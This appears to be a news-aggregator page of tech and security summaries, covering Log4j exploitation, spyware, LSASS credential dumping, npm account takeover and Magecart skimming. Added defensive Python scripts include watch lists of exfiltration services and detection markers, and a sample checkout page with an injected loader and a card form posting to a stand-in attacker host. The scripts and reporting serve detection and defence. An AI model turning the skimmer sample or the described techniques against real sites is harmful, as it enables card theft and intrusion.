IT

In 10 Years, Will 'Remote Work' Simply Be 'Work'? (msn.com) 74

Bloomberg reports: A decade from now, offices shall be used for one thing and one thing only: quality time with colleagues. This seemingly bold prediction comes from Prithwiraj Choudhury, a Harvard Business School professor and expert on remote work. "We will probably in 10 years stop calling this 'remote work'. We'll just call it work," he said....

His research showed that a hybrid workforce is more productive, more loyal and less likely to leave. With companies from Twitter Inc. to PwC now giving employees the option to work virtually forever, Choudhury said businesses that don't adapt risk higher attrition... "For employers, it's a win as well because you are not constrained to hiring from the local labor market — where you have an office... This is a once-in-a-generation moment when people are not going to be forced to live where they don't want to. Some people will find a permanent place to live; some will move around. The digital nomad revolution is going on...."

"We should not care about how many days or hours anyone works. Every job and task should have objective metrics, which are output based, and if an employee can perform those metrics in two days, so be it. I am a firm believer that we should stop counting time. We should give people the flexibility to work when they want to, whichever hours they want to, whichever days they want to, and care only about their work."

Google

Google Workers Protest Plans to Reduce Compensation in Three Cities in North Carolina, Texas, and Iowa (protocol.com) 65

Protocol reports that Google "plans to reduce the equity packages for Durham, North Carolina; Des Moines, Iowa; and Houston, Texas, in January 2022, according to an Alphabet Workers Union petition circulating today that demands a reversion to pay and equity cuts." The Washington Post notes that "For some employees, that means their stock grants could be 25 percent lower than if they worked at other Google offices, like in Atlanta, the workers said in the letter."

With over 800 members, the Alphabet Workers Union is part of a larger effort to organize workers at tech companies. Protocol writes: The Research Triangle area, where the Durham, North Carolina, office is located, was also moved from the "National" pay band to a "Discount" pay band in late 2020, according to the Amazon Workers Union petition. The union said it would affect 300 workers there, but that Google plans to expand to 1,000 employees in the coming years....

Many workers relocated there before the changes in pay and equity were made, the union wrote.

Security

VMware Horizon Servers Are Under Active Exploit By Iranian State Hackers (arstechnica.com) 17

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and add it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
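The hunting advice above (look for unexplained outbound connections to those public services) is easy to turn into a first-pass check over proxy or DNS logs. The script below is an added example, not code from SentinelOne or Ars Technica; the log line format, the source IPs and the non-watched hostnames are constructed for the illustration. It also scores a source host higher when it reaches two or more of the listed services, since a paste site plus a file-transfer site from one workstation is a stronger signal than any single hit.

```python
"""Flag outbound connections to the public services named in the TunnelVision
report (transfer.sh, pastebin.com, webhook.site, ufile.io,
raw.githubusercontent.com). Log format and sample lines are constructed for
this example, not taken from any real proxy product."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Domains named in the report. Subdomains (e.g. api.webhook.site) match too.
WATCHED_DOMAINS = (
    "transfer.sh",
    "pastebin.com",
    "webhook.site",
    "ufile.io",
    "raw.githubusercontent.com",
)

# Constructed log format: timestamp source_ip destination_host "user_agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample lines; the example.com/example.org hosts are hypothetical.
SAMPLE_LOG = """\
2022-02-17T10:01:02Z 10.0.5.12 cdn.example.com "Mozilla/5.0"
2022-02-17T10:01:09Z 10.0.5.40 transfer.sh "PowerShell/5.1"
2022-02-17T10:02:13Z 10.0.5.12 raw.githubusercontent.com "Mozilla/5.0"
2022-02-17T10:03:55Z 10.0.5.40 pastebin.com "Mozilla/5.0"
2022-02-17T10:04:00Z 10.0.5.40 api.webhook.site "curl/7.79"
2022-02-17T10:05:21Z 10.0.5.77 updates.example.org "WindowsUpdate"
"""


def host_matches(host: str) -> Optional[str]:
    """Return the watched domain that `host` equals or is a subdomain of.
    The suffix check requires a leading dot, so pastebin.com.attacker.example
    does not match."""
    host = host.lower().rstrip(".")
    for domain in WATCHED_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def find_suspicious(log_text: str) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group hits by source IP: {src_ip: [(timestamp, host, user_agent), ...]}."""
    hits: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        ts, src, host, ua = m.groups()
        if host_matches(host):
            hits[src].append((ts, host, ua))
    return dict(hits)


def hosts_with_multiple_services(hits: Dict[str, List[Tuple[str, str, str]]],
                                 threshold: int = 2) -> List[str]:
    """Source IPs that reached `threshold` or more distinct watched services."""
    result = []
    for src, events in hits.items():
        services = {host_matches(h) for _, h, _ in events}
        if len(services) >= threshold:
            result.append(src)
    return sorted(result)


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for src, events in hits.items():
        print(src, [h for _, h, _ in events])
    print("multi-service sources:", hosts_with_multiple_services(hits))
```

Expect noise from raw.githubusercontent.com and similar hosts in a developer-heavy environment; the per-source grouping exists so that an analyst can baseline which machines normally talk to these services and focus on the ones that do not, or that hit several of them in a short window.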

Privacy

'Zero-Click' Hacks Are Growing in Popularity. There's Practically No Way To Stop Them (bloomberg.com) 43

With people more wary than ever about clicking on suspicious links in emails and text messages, zero-click hacks are being used more frequently by government agencies to spy on activists, journalists and others, according to more than a dozen surveillance company employees, security researchers and hackers interviewed by Bloomberg News. From a report: Once the preserve of a few intelligence agencies, the technology needed for zero-click hacks is now being sold to governments by a small number of companies, the most prominent of which is Israel's NSO Group. Bloomberg News has learned that at least three other Israeli companies -- Paragon, Candiru and Cognyte Software -- have developed zero-click hacking tools or offered them to clients, according to former employees and partners of those companies, demonstrating that the technology is becoming more widespread in the surveillance industry.

There are certain steps that a potential victim can take that might reduce the chances of a successful zero-click attack, including keeping a device updated. But some of the more effective methods -- including uninstalling certain messaging apps that hackers can use as gateways to breach a device -- aren't practical because people rely on them for communication, said Bill Marczak, a senior research fellow at Citizen Lab, a research group at the University of Toronto that focuses on abuses of surveillance technology.

Security

How a Saudi Woman's iPhone Revealed Hacking Around the World (yahoo.com) 33

A single activist helped turn the tide against NSO Group, one of the world's most sophisticated spyware companies now facing a cascade of legal action and scrutiny in Washington over damaging new allegations that its software was used to hack government officials and dissidents around the world. It all started with a software glitch on her iPhone. Reuters: An unusual error in NSO's spyware allowed Saudi women's rights activist Loujain al-Hathloul and privacy researchers to discover a trove of evidence suggesting the Israeli spyware maker had helped hack her iPhone, according to six people involved in the incident. A mysterious fake image file within her phone, mistakenly left behind by the spyware, tipped off security researchers. The discovery on al-Hathloul's phone last year ignited a storm of legal and government action that has put NSO on the defensive. How the hack was initially uncovered is reported here for the first time. Al-Hathloul, one of Saudi Arabia's most prominent activists, is known for helping lead a campaign to end the ban on women drivers in Saudi Arabia. She was released from jail in February 2021 on charges of harming national security.

Soon after her release from jail, the activist received an email from Google warning her that state-backed hackers had tried to penetrate her Gmail account. Fearful that her iPhone had been hacked as well, al-Hathloul contacted the Canadian privacy rights group Citizen Lab and asked them to probe her device for evidence, three people close to al-Hathloul told Reuters. After six months of digging through her iPhone records, Citizen Lab researcher Bill Marczak made what he described as an unprecedented discovery: a malfunction in the surveillance software implanted on her phone had left a copy of the malicious image file, rather than deleting itself, after stealing the messages of its target. He said the finding, computer code left by the attack, provided direct evidence NSO built the espionage tool. "It was a game changer," said Marczak. "We caught something that the company thought was uncatchable." The discovery amounted to a hacking blueprint and led Apple to notify thousands of other state-backed hacking victims around the world, according to four people with direct knowledge of the incident.

Security

FBI Sounds Alarm as QR Code Usage Soars (axios.com) 71

The pandemic has accelerated the usage of QR codes, taking them from niche status to an essential tool for businesses and marketers. From a report: Look no further than Sunday's Super Bowl commercial of nothing but a floating QR code sending users to the website of Coinbase. [...] Law enforcement officials are sounding the alarm about the risks. The FBI issued an alert in January warning Americans that cybercriminals "are tampering with QR codes to redirect victims to malicious sites that steal login and financial information." If you're scanning a physical code, make sure it hasn't been tampered with. For example, watch out for "a sticker placed on top of the original code," the FBI advises.

Security

US Agencies Say Russian Hackers Compromised Defense Contractors (wired.com) 38

Hackers backed by the Russian government have breached the networks of multiple US defense contractors in a sustained campaign that has revealed sensitive information about US weapons-development communications infrastructure, the federal government said on Wednesday. Wired reports: The campaign began no later than January 2020 and has continued through this month, according to a joint advisory by the FBI, the National Security Agency, and the Cybersecurity and Infrastructure Security Agency. The hackers have been targeting and successfully hacking cleared defense contractors, or CDCs, which support contracts for the US Department of Defense and intelligence community. "During this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months," officials wrote in the advisory. "In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company's products, relationships with other countries, and internal personnel and legal matters."

The exfiltrated documents included unclassified CDC-proprietary and export-controlled information. This information gives the Russian government "significant insight" into US weapons-platforms development and deployment timelines, plans for communications infrastructure, and specific technologies being used by the US government and military. The documents also include unclassified emails among employees and their government customers discussing proprietary details about technological and scientific research.

The hackers have used a variety of methods to breach their targets. The methods include harvesting network passwords through spear phishing, data breaches, cracking techniques, and exploitation of unpatched software vulnerabilities. After gaining a toehold in a targeted network, the threat actors escalate their system rights by mapping the Active Directory and connecting to domain controllers. From there, they're able to exfiltrate credentials for all other accounts and create new accounts. The hackers make use of virtual private servers to encrypt their communications and hide their identities, the advisory added. They also use "small office and home office (SOHO) devices, as operational nodes to evade detection."

IT

Canada's Major Banks Go Offline in Mysterious Hours-long Outage (bleepingcomputer.com) 310

Five major Canadian banks went offline for hours, blocking access to online and mobile banking as well as e-transfers for customers. From a report: The banks reportedly hit by the outage include Royal Bank of Canada (RBC), BMO (Bank of Montreal), Scotiabank, and the Canadian Imperial Bank of Commerce (CIBC). Canada's five major banks went offline yesterday impeding access to e-Transfers, online and mobile banking services for many.

Security

How Roblox 'Beamers' Get Rich Stealing from Children (vice.com) 47

Underneath the gaming platform worth $68 billion and used by over half of all children in America is a ballooning and highly profitable ecosystem of hackers and traders. From a report: Motherboard spoke to 11 people connected to Roblox beaming (Roblox slang for getting hacked and your items stolen), including victims, the people who administer the marketplaces where people then sell Roblox items, and hackers themselves. There's a ballooning and highly profitable ecosystem where hackers stand to steal tens of thousands of dollars worth of items in minutes, with many victims including children. The sketchy, and sometimes illicit, economy sits in the shadow of Roblox's legitimate business, which is worth $68 billion and which half of all children in the U.S. play on in some form. One beamer called Max told Motherboard how he targets many of these victims. "I go to servers with rich idiots, then message every single one of them," he said.

Roblox isn't a single game but a free application players download onto their PC, phone, or Xbox games console. From there, they can access tens of millions of different games, or as Roblox calls them, "experiences," made by members of the wider Roblox community and player base. At the time of this writing, popular Roblox games include Murder Mystery 2, where players try to identify the killer; Pet Simulator X, for players who want to take care of and trade pets; and Hide and Seek Extreme.

Businesses

Akamai To Acquire Linode (linode.com) 19

"Akamai, which announced quarterly earnings today, also announced that they plan to acquire longtime Linux VPS host Linode for $900 million," writes Slashdot reader virtig01. From a press release announcing the acquisition: Akamai Technologies, the world's most trusted solution to power and protect digital experiences, today announced it has entered into a definitive agreement to acquire Linode, one of the easiest-to-use and most trusted infrastructure-as-a-service (IaaS) platform providers. [...] Under terms of the agreement, Akamai has agreed to acquire all of the outstanding equity of Linode Limited Liability Company for approximately $900 million, after customary purchase price adjustments. As a result of structuring the transaction as an asset purchase, Akamai expects to achieve cash income tax savings over the next 15 years that have an estimated net present value of approximately $120 million. The transaction is expected to close in the first quarter of 2022 and is subject to customary closing conditions.

Christopher Aker, founder and chief executive officer, Linode, added, "We started Linode 19 years ago to make the power of the cloud easier and more accessible. Along the way, we built a cloud computing platform trusted by developers and businesses around the world. Today, those customers face new challenges as cloud services become all-encompassing, including compute, storage, security and delivery from core to edge. Solving those challenges requires tremendous integration and scale which Akamai and Linode plan to bring together under one roof. This marks an exciting new chapter for Linode and a major step forward for our current and future customers."

Security

74% of Ransomware Revenue Goes To Russia-Linked Hackers (bbc.com) 51

New analysis suggests that 74% of all money made through ransomware attacks in 2021 went to Russia-linked hackers. The BBC reports: Researchers say more than $400 million worth of crypto-currency payments went to groups "highly likely to be affiliated with Russia." Russia has denied accusations that it is harboring cyber-criminals. Researchers also claim "a huge amount of crypto-currency-based money laundering" goes through Russian crypto-companies. Chainalysis, which carried out the research, said it was able to follow the flow of money to and from the digital wallets of known hacking groups using public blockchain transaction records.

In the Chainalysis report, it's highlighted that 9.9% of all known ransomware revenue is going to Evil Corp - an alleged cyber-crime group which the US has issued sanctions and indictments against, but who are operating in Russia with apparent impunity. A BBC investigation in November found that Igor Turashev, one of the accused leaders of Evil Corp, is operating several businesses out of Moscow City's Federation Tower. The tower is one of Russia's most prestigious addresses, home to prominent businesses and with apartments going for millions of dollars. Chainalysis claims several crypto-currency companies based in the tower were used by hackers to launder illicit funds, turning crypto-currency from digital wallet addresses to mainstream money. "In any given quarter, the illicit and risky addresses account for between 29% and 48% of all funds received by Moscow City crypto-currency businesses," researchers allege.

Security

Ukraine's Military and Banks Hit By Apparent DDoS Cyberattack Campaign (cnet.com) 45

Ukraine's Ministry of Defense website suffered from what appeared to be a distributed denial of service attack Tuesday, according to the government's Facebook account. CNET reports: The military's website remained unavailable as of 12 p.m. PT Tuesday, with the Ukrainian military's Facebook account saying work is currently underway to restore regular functioning to the online portal. The nation's largest commercial bank, PrivatBank, has also been subjected to a "massive DDoS attack" for the past few hours, according to the Ukraine Center for Strategic Communications. There's no threat to customer funds stored at the bank, it said, though the attack is preventing customers from accessing the Privat24 application and viewing their balances. Online banking with Oschadbank is also down, the Center for Strategic Communications said, as reported earlier by Vice. Nobody has yet been blamed for the attack, but as CNET notes, "it comes after Russia is believed to have mounted multiple cyberattacks on Ukraine as part of efforts that security experts say are designed to destabilize the country's government and economy."

UPDATE (2/16/2022): America's Undersecretary of State said Wednesday that "While we're still investigating and doing forensics along with the Ukrainians, I think what's most important is that these cyberattacks were not very successful," reports CNN, which adds that the official "credited Ukrainian officials for responding quickly and helping the websites recover."

Privacy

Pegasus Spyware Should Be Banned, EU Data Agency Warns (bloomberg.com) 26

NSO Group's controversial Pegasus spyware should be banned in the European Union, the bloc's in-house privacy watchdog warned on Tuesday. From a report: "The ban on the development and the deployment of spyware with the capability of Pegasus in the EU would be the most effective option to protect our fundamental rights and freedoms," the European Data Protection Supervisor said in a statement on Tuesday. The warning comes amid increasing scrutiny of abuses of surveillance technologies meant to help intelligence and law enforcement agencies fight serious crime and terrorism. While the EU regulator doesn't make decisions for member countries, its influence at the top echelons of the bloc's institutions may encourage other authorities to crack down on surveillance software.

Security

Microsoft Defender Will Soon Block Windows Password Theft (bleepingcomputer.com) 33

Microsoft is enabling a Microsoft Defender 'Attack Surface Reduction' security rule by default to block hackers' attempts to steal Windows credentials from the LSASS process. BleepingComputer reports: When threat actors compromise a network, they attempt to spread laterally to other devices by stealing credentials or using exploits. One of the most common methods to steal Windows credentials is to gain admin privileges on a compromised device and then dump the memory of the Local Security Authority Server Service (LSASS) process running in Windows. This memory dump contains NTLM hashes of Windows credentials of users who had logged into the computer that can be brute-forced for clear-text passwords or used in Pass-the-Hash attacks to log in to other devices. While Microsoft Defender blocks programs like Mimikatz, an LSASS memory dump can still be transferred to a remote computer to dump credentials without fear of being blocked.

To prevent threat actors from abusing LSASS memory dumps, Microsoft has introduced security features that prevent access to the LSASS process. One of these security features is Credential Guard, which isolates the LSASS process in a virtualized container that prevents other processes from accessing it. However, this feature can lead to conflicts with drivers or applications, causing some organizations not to enable it. As a way to mitigate Windows credential theft without causing the conflicts introduced by Credential Guard, Microsoft will soon be enabling a Microsoft Defender Attack Surface Reduction (ASR) rule by default. The rule, 'Block credential stealing from the Windows local security authority subsystem,' prevents processes from opening the LSASS process and dumping its memory, even if it has administrative privileges.

While enabling the ASR rule by default will significantly impact the stealing of Windows credentials, it is not a silver bullet by any means. This is because the full Attack Surface Reduction feature is only supported on Windows Enterprise licenses running Microsoft Defender as the primary antivirus. However, BleepingComputer's tests show that the LSASS ASR rule also works on Windows 10 and Windows 11 Pro clients. Unfortunately, once another antivirus solution is installed, ASR is immediately disabled on the device. Furthermore, security researchers have discovered built-in Microsoft Defender exclusion paths allowing threat actors to run their tools from those filenames/directories to bypass the ASR rules and continue to dump the LSASS process. Mimikatz developer Benjamin Delpy told BleepingComputer that Microsoft probably added these built-in exclusions for another rule, but as exclusions affect ALL rules, it bypasses the LSASS restriction.

Music

How Fake Song Lyrics Ended Up On Spotify (pitchfork.com) 26

DevNull127 writes: More bad news for Spotify from Condé Nast via their music site Pitchfork:

Last month, in the tone of a band reluctantly summoned from some deep seabed, My Bloody Valentine issued a prickly public service announcement: "Just noticed that Spotify has put fake lyrics up for our songs without our knowledge," the Irish shoegazers tweeted. "These lyrics are actually completely incorrect and insulting." Cocteau Twins' Simon Raymonde chimed in to report that they, too, had found gibberish transcriptions of their famously elliptical songs on streaming services.

The lyric snafu was not limited to Spotify. Over the past decade, a data platform called Musixmatch has assumed dominion over the world of lyrics, securing sub-licensing deals with the major publishing companies. The lyrics you see on Spotify, Tidal, and Amazon Music usually come through Musixmatch, via a data pipeline that links the platform's enormous transcriber community with a small core of paid quality-control monitors. (Apple Music has a dedicated lyrics team handling most of its transcriptions.)

The affair illustrates tech capitalism's discombobulation when faced with a key element in art, which is the inexplicable. I think the problem, though, is not Musixmatch and its protocol so much as the service's unilateral rollout, with quasi-official imprimatur, on platforms already under fire for flattening artistic identity and repackaging music as scaleable content. Having sub-licensed the rights, Musixmatch is perfectly entitled to crowd-source transcriptions and sell them on. But artists should know whose words are being put in their mouths—and that, should they wish, they have the right to opt out.

Security

Thousands of Npm Accounts Use Email Addresses With Expired Domains (therecord.media) 35

An academic research project found that thousands of JavaScript developers are using an email address with an expired domain for their npm accounts, leaving their projects exposed to easy hijacks. From a report: The study, performed last year by researchers from Microsoft and North Carolina State University, analyzed the metadata of 1,630,101 libraries uploaded on Node Package Manager (npm), the de-facto repository for JavaScript libraries and the largest package repository on the internet. Researchers said they found that 2,818 project maintainers were still using an email address for their accounts that had an expired domain, some of which they found on sale on sites like GoDaddy. The team argued that attackers could buy these domains, re-register the maintainer's address on their own email servers, and then reset the maintainer's account password and take over his npm packages.

Opera
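A consumer of npm packages can run the same kind of check on its own dependency tree: pull each package's maintainer emails from the registry metadata, extract the domains, and flag any that no longer resolve. The script below is an added example and is not the researchers' tooling; the package records, maintainer names and domains in it are constructed, and the DNS lookup is passed in as a function so the check runs offline and can be swapped for a WHOIS/RDAP query.

```python
"""Flag npm maintainers whose email domain no longer resolves, as an added
illustration of the expired-domain risk. The packuments below are
constructed for the example (names, emails and domains are hypothetical),
and the resolver is injectable so the check runs offline."""
import socket
from typing import Callable, Dict, List, Optional

# Shape of the relevant part of an npm registry packument: the `maintainers`
# array holds {"name": ..., "email": ...} objects. Constructed sample data.
SAMPLE_PACKUMENTS = [
    {"name": "left-pad-ish", "maintainers": [
        {"name": "alice", "email": "alice@example.com"}]},
    {"name": "tiny-utils", "maintainers": [
        {"name": "bob", "email": "bob@lapsed-domain-example.test"},
        {"name": "carol", "email": "carol@example.org"}]},
    {"name": "fast-parse", "maintainers": [
        {"name": "dave", "email": "dave@lapsed-domain-example.test"},
        {"name": "erin", "email": "not-an-address"}]},
]


def email_domain(email: str) -> Optional[str]:
    """Return the lowercase domain part of an address, or None if malformed."""
    if email.count("@") != 1:
        return None
    local, _, domain = email.partition("@")
    if not local or not domain:
        return None
    return domain.lower().rstrip(".")


def domain_resolves_dns(domain: str) -> bool:
    """Live resolver (not used by the offline sample run). A domain with no
    address resolution is only a candidate: it may be registered but unused,
    so confirm expiry with a registrar (WHOIS/RDAP) lookup before acting."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def find_at_risk_maintainers(
    packuments: List[dict],
    resolves: Callable[[str], bool] = domain_resolves_dns,
) -> Dict[str, List[str]]:
    """Map each non-resolving maintainer domain to the packages it can control."""
    at_risk: Dict[str, List[str]] = {}
    checked: Dict[str, bool] = {}  # memoize one lookup per domain
    for pkg in packuments:
        for maintainer in pkg.get("maintainers", []):
            domain = email_domain(maintainer.get("email", ""))
            if domain is None:
                continue  # malformed address; nothing to look up
            if domain not in checked:
                checked[domain] = resolves(domain)
            if not checked[domain]:
                at_risk.setdefault(domain, []).append(pkg["name"])
    return at_risk


if __name__ == "__main__":
    # Offline demonstration: pretend only the lapsed domain fails to resolve.
    fake_resolver = lambda d: d != "lapsed-domain-example.test"
    print(find_at_risk_maintainers(SAMPLE_PACKUMENTS, fake_resolver))
```

The output maps a lapsed domain to every package whose maintainer uses it, which is the blast radius a takeover of that domain would have; a package with at least one other maintainer on a healthy domain is not automatically safe, because any single maintainer account can publish.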

Opera Browser Now Allows Emoji-only Web Addresses (theverge.com) 61

Web browser company Opera said Monday it will enable emoji-only based web addresses "to bring a new level of creativity to the internet." From a report: The integration is part of a partnership with Yat, a company that sells URLs with strings of emoji in them. "It's been almost 30 years since the world wide web launched to the public, and there hasn't been much innovation in the weblink space: people still include .com in their URLs," Jorgen Arnesen, executive vice president of mobile at Opera, said in a press release.

Security

Linux Malware Attacks are Increasing, and Businesses Aren't Ready (zdnet.com) 63

ZDNet reports: Cyber criminals are increasingly targeting Linux servers and cloud infrastructure to launch ransomware campaigns, cryptojacking attacks and other illicit activity — and many organisations are leaving themselves open to attacks because Linux infrastructure is misconfigured or poorly managed. Analysis from cybersecurity researchers at VMware warns that malware targeting Linux-based systems is increasing in volume and complexity, while there's also a lack of focus on managing and detecting threats against them.

This comes after an increase in enterprises relying on cloud-based services because of the rise of hybrid working, with Linux the most common operating system in these environments. That rise has opened new avenues that cyber criminals can exploit to compromise enterprise networks, as detailed by the research paper, including ransomware and cryptojacking attacks tailored to target Linux servers in environments that might not be as strictly monitored as those running Windows. These attacks are designed for maximum impact, as the cyber criminals look to compromise as much of the network as possible before triggering the encryption process and ultimately demanding a ransom for the decryption key.

The report warns that ransomware has evolved to target Linux host images used to spin up workloads in virtualised environments, enabling the attackers to simultaneously encrypt vast swathes of the network and make incident response more difficult. The attacks on cloud environments also result in attackers stealing information from servers, which they threaten to publish if they're not paid a ransom.... Cryptojacking and other malware attacks are also increasingly targeting Linux servers. Cryptojacking malware steals processing power from CPUs and servers in order to mine for cryptocurrency....

Many of the cyberattacks targeting Linux environments are still relatively unsophisticated when compared with equivalent attacks targeting Windows systems — that means that with the correct approach to monitoring and securing Linux-based systems, many of these attacks can be prevented. That includes cybersecurity hygiene procedures such as ensuring default passwords aren't in use and avoiding sharing one account across multiple users.

Security

America's Cybersecurity Agency is Now Urging 'Heightened Posture' Against Russian Cyberattacks (pcmag.com) 29

America's Cybersecurity and Infrastructure Security Agency (CISA) "says that American companies should be extra wary about potential hacking attempts from Russia as tensions with the country rise," reports PC Magazine: Even if Russia doesn't invade Ukraine, it has often targeted the country with what Wired has characterized as "many of the most costly cyberattacks in history." Those attacks might not always be confined to Ukraine, however, which is where CISA's new Shields Up campaign comes in.... CISA says that it "recommends all organizations — regardless of size — adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets." It also says that it's collaborated with its "critical infrastructure partners" to raise awareness of these risks.

The agency wants everyone to "reduce the likelihood of a damaging cyber intrusion," "take steps to quickly detect a potential intrusion," "ensure that the organization is prepared to respond if an intrusion occurs," and "maximize the organization's resilience to a destructive cyber incident." CISA offers advice related to each of those focus areas on its website.

Earlier this week CISA also added 15 "known exploited" vulnerabilities to its catalog, ZDNet reports, in products from Apache, Apple, Jenkins, and Microsoft: The list includes a Microsoft Windows SAM local privilege escalation vulnerability with a remediation date set for February 24. Vulcan Cyber engineer Mike Parkin said the vulnerability — CVE-2021-36934 — was patched in August 2021 shortly after it was disclosed. "It is a local vulnerability, which reduces the risk of attack and gives more time to deploy the patch. CISA set the due date for Federal organizations who take direction from them, and that date is based on their own risk criteria," Parkin said. "With Microsoft releasing the fix 5 months ago, and given the relative threat, it is reasonable for them to set late February as the deadline."

Security

Hundreds of E-Commerce Sites Booby-Trapped With Payment Card-Skimming Malware (arstechnica.com) 9

An anonymous reader quotes a report from Ars Technica, written by Dan Goodin: About 500 e-commerce websites were recently found to be compromised by hackers who installed a credit card skimmer that surreptitiously stole sensitive data when visitors attempted to make a purchase. A report published on Tuesday is only the latest one involving Magecart, an umbrella term given to competing crime groups that infect e-commerce sites with skimmers. Over the past few years, thousands of sites have been hit by exploits that cause them to run malicious code. When visitors enter payment card details during purchase, the code sends that information to attacker-controlled servers.

Sansec, the security firm that discovered the latest batch of infections, said the compromised sites were all loading malicious scripts hosted at the domain naturalfreshmall[.]com. "The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," firm researchers wrote on Twitter. "Payments are sent to https://naturalfreshmall.com/p...." The hackers then modified existing files or planted new files that provided no fewer than 19 backdoors that the hackers could use to retain control over the sites in the event the malicious script was detected and removed and the vulnerable software was updated. The only way to fully disinfect the site is to identify and remove the backdoors before updating the vulnerable CMS that allowed the site to be hacked in the first place.

Sansec worked with the admins of hacked sites to determine the common entry point used by the attackers. The researchers eventually determined that the attackers combined a SQL injection exploit with a PHP object injection attack in a Magento plugin known as Quickview. [...] It's not hard to find sites that remain infected more than a week after Sansec first reported the campaign on Twitter. At the time this post was going live, Bedexpress[.]com continued to contain this HTML attribute, which pulls JavaScript from the rogue naturalfreshmall[.]com domain. The hacked sites were running Magento 1, a version of the e-commerce platform that was retired in June 2020. The safer bet for any site still using this deprecated package is to upgrade to the latest version of Adobe Commerce. Another option is to install open source patches available for Magento 1 using either DIY software from the OpenMage project or with commercial support from Mage-One.
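The Sansec description (a loader script pulled from a third-party domain, plus a fake payment form posting off-site) suggests a simple integrity check a site owner can run against their own checkout pages: parse the HTML and report every script, iframe and form target whose host is not on an allowlist of first-party and known payment-provider hosts, plus inline scripts that build script tags or decode base64 at runtime. The script below is an added example, not Sansec's tooling; the allowlist, the sample page and the rogue host `evil-skimmer.example` are constructed, and the inline-script markers are a heuristic rather than a definitive skimmer signature.

```python
"""Report third-party script/iframe/form targets and suspicious inline scripts
in an HTML page, as an added illustration of spotting a Magecart-style
injected loader. Allowlist, sample page and the rogue host are constructed."""
from html.parser import HTMLParser
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit

# Constructed allowlist: the shop's own hosts and its hosted payment form.
ALLOWED_HOSTS = {"shop.example", "checkout.payments-provider.example"}

# Constructed checkout page containing one injected loader, one off-site form
# and one obfuscated inline script next to legitimate resources.
SAMPLE_HTML = """<html><head>
<script src="https://static.shop.example/js/app.js"></script>
<script src="//evil-skimmer.example/loader.js"></script>
<script>var p = atob("Zm9v"); document.head.appendChild(document.createElement("script"));</script>
</head><body>
<form action="/checkout" method="post"><input name="qty"></form>
<form action="https://evil-skimmer.example/collect" method="post"><input name="cc"></form>
<iframe src="https://checkout.payments-provider.example/frame"></iframe>
</body></html>"""

# Heuristic markers for inline scripts that assemble code at runtime.
INLINE_MARKERS = ("atob(", "fromCharCode", 'createElement("script")',
                  "createElement('script')", "eval(")


class ResourceCollector(HTMLParser):
    """Collect (tag, url) for loaders and form targets, and inline script bodies."""
    TAG_ATTRS = {"script": "src", "iframe": "src", "form": "action"}

    def __init__(self) -> None:
        super().__init__()
        self.refs: List[Tuple[str, str]] = []
        self.inline_scripts: List[str] = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        attr_map = dict(attrs)
        attr = self.TAG_ATTRS.get(tag)
        if attr and attr_map.get(attr):
            self.refs.append((tag, attr_map[attr]))
        if tag == "script":
            self._in_inline_script = attr_map.get("src") is None

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_inline_script and data.strip():
            self.inline_scripts.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def collect_resources(html: str) -> ResourceCollector:
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    return parser


def is_allowed(host: str, allowed: Iterable[str]) -> bool:
    return any(host == a or host.endswith("." + a) for a in allowed)


def find_rogue_references(html: str, allowed: Iterable[str]) -> List[Tuple[str, str]]:
    """(tag, host) pairs whose host is off the allowlist. Relative URLs are
    first-party and skipped; protocol-relative //host URLs are resolved."""
    rogue = []
    for tag, url in collect_resources(html).refs:
        host = urlsplit(url).hostname
        if host is None:
            continue
        if not is_allowed(host.lower(), allowed):
            rogue.append((tag, host.lower()))
    return rogue


def suspicious_inline_scripts(html: str) -> List[str]:
    """Inline script bodies containing any of the runtime-assembly markers."""
    return [s for s in collect_resources(html).inline_scripts
            if any(marker in s for marker in INLINE_MARKERS)]


if __name__ == "__main__":
    print(find_rogue_references(SAMPLE_HTML, ALLOWED_HOSTS))
    print(len(suspicious_inline_scripts(SAMPLE_HTML)), "suspicious inline script(s)")
```

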